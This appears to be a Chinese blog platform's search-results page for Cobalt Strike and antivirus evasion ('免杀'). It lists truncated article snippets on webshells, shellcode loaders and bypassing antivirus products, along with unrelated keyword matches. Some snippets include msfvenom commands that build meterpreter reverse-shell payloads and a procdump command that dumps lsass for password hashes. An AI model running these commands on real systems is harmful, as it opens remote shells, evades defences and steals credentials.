strike免杀

MSF内网渗透实战

小熊保安本来还是想用cobaltstrike,但是由于某些原因,暂时关闭了cobaltstrike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀
zkzq·2022-05-21 16:46

Cobalt Strike 4.0渗透攻击工具

前言前几天在做综合靶场的时候,有一个不太完整的vulntarget-a综合靶场,在这里我用了cs工具那么今天就给大家简单的说一下这个工具1、工具简介CobaltStrike是一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,windll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点
TJA小傲·2022-05-13 12:39

巨龙拉冬:让你的Cobalt Strike变成超级武器

CobaltStrike巨龙拉冬插件9.0发布,让大家久等了,就当是程序员节礼物。原计划是Ladon8.0的时候出的,当时也实现了部份功能,但因为放在虚拟机里,可能误删了没备份,也因为各种事懒得重写,拖着拖着Ladon已出到9.0了,也想国庆写,但国庆又想上王者,于是又拖到最近两天才重写插件,CS右键已实现90%的功能部分功能请先在Beacon命令行使用。巨龙拉冬中文插件和Ladon英文插件的区别
k8gege·2022-05-12 10:19

Cobalt Strike: 解密混淆过的流量-Part 4

https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/博文系列:CobaltStrike
爱你'非我莫属。·2022-05-07 13:10

# Cobalt Strike: 使用进程内存解密流量-Part 3

博客系列:CobaltStrike:流量解密CobaltStrike:使用已知的私钥解密流量-Part1CobaltStrike:使用已知的私钥解密流量-Part2CobaltStrike:使用进程内存解密流量-Part3(当前部分)CobaltSteike:解密被掩盖的流量-Part4CobaltStrike:解密DNS流量-Part5我们使用从内存进程中提取出来的密钥来解密了CobaltStr
爱你'非我莫属。·2022-05-07 13:10

【原创】ShellCode免杀的骚姿势

ShellCode免杀的骚姿势常见的免杀手法:shellcode(攻击代码)和加载程序的分离;Lolbins白利用加载shellcode(白名单利用);shellcode混淆、编码解码;shellcode
黑羽sec·2022-05-05 14:00

PE文件结构与程序装载

PE文件结构与程序装载是掌握Windows逆向、加壳、免杀等技术的基础,本文详细记录了PE文件的基本结构,用编辑器对文件结构进行分析,并介绍程序装载的相关概念和基本过程。
Captain_RB·2022-05-05 08:42

第48天-WAF 绕过-权限控制之代码混淆及行为造轮子

思维导图Safedog代码层手写及脚本绕过变量覆盖,加密混淆,异或生成BTAliyun代码层手写及脚本绕过编码解码(变量覆盖,加密混淆,异或生成)ASP,PHP,ASPX,JSP,PY等后门免杀同理一句话后门的原理
IsecNoob·2022-04-18 12:17

渗透测试利器【Cobalt Strike】CDN隐匿

CobaltStrike概述CobaltStrike是一款漂亮国RedTeam开发的渗透测试神器,常被业界人称为CS。成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,CobaltStrike还可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。CDN及特
IT老涵·2022-04-01 14:37

Spring框架漏洞合集

前言上周用了一周的时间把java基础部分看完了(也就是能看懂代码),打算把常见java框架的漏洞复现一下,后面着重web端的渗透测试以及实战项目,还要学免杀、社工(任重道远),所以不打算学习java框架了
X1m0·2022-03-30 08:24

你不知道的那些字符串方法~

anchor/small/big/fontsize/blink/bold/italics/strike都是用来创建标签//添加锚点用的consttxt="context";consthtmla=txt.anchor
·2022-03-29 18:52

vulntarget-a靶场的学习思考

前言:最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境靶场由星期五实验室与乌鸦安全共同维护
vlan911·2022-03-23 21:34

数据包中的加密之RC4加密介绍

在一次偶然间对GitHub上找的免杀马代码学习的时候才认识了这个加密方式,在这个行业之间人与人的差距不是一点半点。介绍:RC4算法的特点是算法简单,执行速度快。
你可以叫我风平·2022-03-23 10:24

Python安全开发——多线程Fuzz&Waf 异或免杀&爆破

1.概述:知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等2.简单多线程技术、FTP模块实现协议爆破脚本:queue,threading模块使用、ftplib模块使用:遍历用户及密码字典、尝试连接执行命令判断ftp模块使用:https://www.cnblogs.com
暮w光·2022-03-09 05:46

Jsp Webshell 免杀-命令执行

在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。命令执行在之前的Java命令执行中学习了执行系统命令的几个类。这次我们还是以经典的Runtime类来测试。")
CSeroad·2022-03-07 10:30

cobalt strike使用跳板进行内网渗透

0x01什么是PivotingPivoting,在本手册中,指的是「将一个受害机器转为其他攻击和工具的跳板」。CobaltStrike的Beacon提供了多种pivoting选项。前提是Beacon处于交互模式。交互模式意味着一个Beacon每秒内多次连接到团队服务器。使用sleep0命令来使你的Beacon进入交互模式。0x02开启SOCKS代理通过[beacon]→Pivoting→SOCKS
风炫安全·2022-02-22 14:26

Jsp Webshell 免杀-类加载器

前言在经过java类加载器的学习,我们对webshell的免杀处理就可以更进一步。自定义类加载器-命令执行对于如何自定义类加载的详细过程,可参考Java类加载器学习。这里就不多阐述了。
CSeroad·2022-02-17 15:12

记一则免杀技巧

CobaltStrike+Metasploit联动里提到了CS与MSF联动的场景类似这种后渗透环境中,我一直在琢磨怎样才能神不知鬼不觉地执行一个meterpreter这种功能强大的Payload网上关于免杀和隐蔽执行的思路与技巧有很多
慕长风啊·2022-02-14 11:38

攻防基础工具系列 Post Exploitation工具 Cobalt Strike

本篇文章将介绍CobaltStrike的基础用法,这里面会给出一个完整的例子,来讲解如何使用CobaltStrike完成一次完整的内网渗透前置条件假设我们通过钓鱼邮件,控制了域内一台普通员工机器。接下来,我们如何进行横向移动呢?image-20200131150530973.png进入命令行image-20200131151142788.png点击interact,进入命令行界面image-202
墨攻科技·2022-02-10 14:32

刚工作,不知道怎么变得专业

今天特么可贼热,我QQ上又来了一个想搞暧昧的寂寞人,我拒绝了一次,哎,又给我来了第二次,可是特么这样都能撩动我,可见人性是多么软弱,理智是多么脆弱,我活了20年,就是跟人性斗争的血泪史,他让我避免杀身之祸
三个么么哒·2022-02-09 14:39

webshell之jsp免杀

webshell之jsp免杀转载自webshell免杀研究原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。
tomyyyyy·2022-02-05 21:06

二打保龄球

第一局我的发挥还算正常,打了61分,最后一个球还来了个STRIKE。小朋友就不如我了,每次一个没打中的时候就很不自在,嘴里嘟囔着好像给自己找个打不好的理由。我
玲珑瑜·2022-02-04 21:38

weevely的使用及免杀(Linux中的菜刀)

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描,请求重发,漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhu
漫路在线·2022-02-04 16:05

免杀技术】Tomcat内存马-Filter

Tomcat内存马-Filter型什么是内存马?为什么要有内存马?什么又是Filter型内存马?这些问题在此就不做赘述Filter加载流程分析tomcat启动后正常情况下对于Filter的处理过程:加载web.xml配置文件读取filter的信息,并将其保存在context对象里的filterDef,filterConfigs,filterMappers中filterChain的构造流程:1.匹配
Aurora-M·2022-02-04 15:00

VC++源码免杀教程 286合购网ghost免杀教程

网络攻防技术中的免杀技术是十分有趣的,尤其要说ghostvc++源码免杀,过掉国内的杀毒软件,达到不损坏功能,正常上线,从而无视杀软的存在.免杀之网络攻防入门书籍推荐1.杀不死的秘密-反汇编揭露黑客免杀变种技术
玩弄你们·2022-02-03 06:16

内网渗透-免杀抓取windows hash

前言内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。大部分情况会遇到防护软件,常规抓取方法失效,因此需要对防护进行绕过。Procdump.exeProcdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。首先使用procdump.exe把进程lsass.exe的内存dump下来procdump.exe-acce
Tide_诺言·2022-02-02 22:05

Python免杀木马轻松过Defender,秒杀36*和火*

测试环境联网的Win10,开启了Defender最新的火绒和360杀毒Defender肯定要取消上传可疑文件的!测试步骤这里使用CS生成python类型的木马文件,并对生成的shellcode进行Base64编码和HEX编码,将编码后的shellcode分成几个文件存放,再去请求下载并解码,最后将解码后的shellcode加载到内存中。编译成EXE,顺便使用upx压缩下:开启Defender的Wi
LMcream·2022-01-27 09:21

红队远控免杀初探

免杀初探自己一直是研究wb安全方向比较多,对红队远控免杀的认知基本没有,一直是听着大哥们说,却一直没有静下心来系统性的学习过,这里记录下免杀的学习记录。
CKCsec·2021-12-02 14:46

Cobalt Strike

CobaltStrike安装JAVA环境1.下载java1.8地址:https://www.oracle.com/java/technologies/javase/javase8u211-later-archive-downloads.html2.安装在自己选取的VPS或者其他地方安装3.配置环境变量4.查看结果查看java安装是否完毕(如何下即成功。)输入:java-versionCobaltS
可乐-kele·2021-11-30 23:00

Assassin暗杀者-自用短小精悍的webshell管理工具分享

自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀毒软件(36x、腾x等,目前能过,后面可能很快就不行了,需要稍微变换webshell代码以再次免杀)连接后交互的流量特征几乎没有
b1ackc4t·2021-11-23 21:00

windows命令混淆

最近有些朋友问我一些免杀问题,由于个人技术有限,对静态免杀有些了解(动态免杀真的不会,太菜了),所以就总结了一些Windows中cmd的命令混淆思路,静态免杀无非就是对安全设备检测到代码(命令)中的特征字符进行查杀
·2021-11-10 17:19

【Web安全】JSP内存马研究

前言最近在研究webshell免杀的问题,到了内存马免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的
IT老涵·2021-10-19 16:08

冰雪奇缘FrozenDay13

pænts/n.裤子feistypants暴脾气的人anchor/'æŋkɚ/n.锚outofshape走样skull/skʌl/n.脑壳cliff/klɪf/n.悬崖falloff跌落turnwhite变白strike
plitt·2021-10-12 23:22

前端面试每日 3+1 —— 第908天

今天的知识点(2021.10.10)——第908天(我也要出题)[html]你有使用过html的strike标签吗?[css]说下@supports有什么用途?
·2021-10-11 12:15

Metasploit 实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2021-10-08 14:06

渗透测试-木马免杀的几种方式

前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。
白面安全猿·2021-09-28 21:25

《水浒传》专题探究之英雄辨析(二)

结识英雄过渡语:有人说,这些梁山好汉中,有些人不是“真英雄”,如宋江怕李逵造反,在临死前为了保住自己的虚名,竟然毒死自己肝胆相照的好兄弟,不是英雄所为;武松在血洗鸳鸯楼时,杀死张都监家眷和仆人十几人,不免杀心过重
一一真·2021-09-23 03:38

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

文章来源|MS08067红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfvenom生成payload,命令如下:msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.61.103lport=4444-ex86/shikata_ga_n
Ms08067安全实验室·2021-09-01 07:00

红队培训班作业 | 免杀过360和火绒 四种方法大对比

MS08067红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kalilinux安装cs4.2,Windows7系统安装火绒杀毒和360杀毒,为测试免杀并且防止联网查杀
Ms08067安全实验室·2021-08-16 07:00

reset.css

h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike
洪源9213·2021-06-21 10:09

一分钟英语趣问答 30

答案:dry词汇:touch/tʌtʃ/vi.触摸,接近,涉及,提到,触动n.接触,触觉,少许[近义词]:n.contactv.move,strike,change[惯用语]:intouchwith同…
GBmelody·2021-06-12 20:13

后渗透免杀返回shell教程

一天一个入狱小技巧,教程地址:https://www.bilibili.com/video/BV1xa4y1p7Kr
表弟_十七·2021-06-08 20:34

无力吐槽的命运

话说过年家家户户不免杀鸡杀鸭的,一邻居抱怨说:哎呀,今早就要杀了,结果忘记了,还喂了一肚子饱饱的。我九十岁的爷爷接话了:过去犯人要砍头的时候还得给一顿饱,你就多喂一把谷子又算得了什么。
不思九八·2021-06-05 13:13

2019-11-08-基于TDD实现的java版本的保龄球规则(记录note)

2:如果第一球就把全部的球瓶都击倒了,也就是STRIKE,画面出现“X”,就算完成一轮了,所得分数是10分再加后面两球的倒瓶数,3:如果第一球没有全倒,就要再打一球,如果第二球将剩下的球瓶全都击倒,也就是
jolly0071·2021-06-04 23:26

powershell加密、压缩 免杀实战

结合"PowerShellcrypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软1、msfvenom生成powershell反弹马msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=192.168.81.253LPORT=5555-fpsh-reflection>hacksh
城市烈人·2021-06-04 14:22

探索跟盈利矛盾

新证明新数据,容错,不很确定的,隐藏免杀的走两步,共存,但总的仍掌控。大数据动轨迹。仍在我的掌控下,动,所以为监控。有限的资源开发监控非常不
gbaidu2009_·2021-05-28 07:46

python免杀技术---复现+改进----1

0x01复现复现文章:https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6首先用cobaltstruke生成一个python的payload脚本然后复制里面的payload进行Base64编码:加密
go0dStudy·2021-05-22 20:44

python免杀技术---shellcode的加载与执行

0x01生成shellcode首先通过下列命令生成一个shellcode,使用msfvenom-p选项来指定paylaod,这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。msfvenom-pwindows/x64/execCMD='calc.exe'-fpy0x02加载与执行shellcode的
go0dStudy·2021-05-22 15:07

使用Metasploit对Windows系统渗透测试——加壳免杀花指令

文章目录前言一、准备工作1.生成被控端攻击载荷2.生成主控端handler二、获取winxp的shell三、获取win7的shell四、获取win10的shell1.免杀+捆绑2.加壳+压缩3.花指令4
我重来不说话·2021-05-21 21:51

40

这感受就像英文中的strike,或者hit。05年,人人都知道阿空是个幼稚到不行的小孩,语文老师在课上拿我的作文说教,她
钟悟空·2021-05-21 13:23
上一页 7 8 9 10 11 12 13 14 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他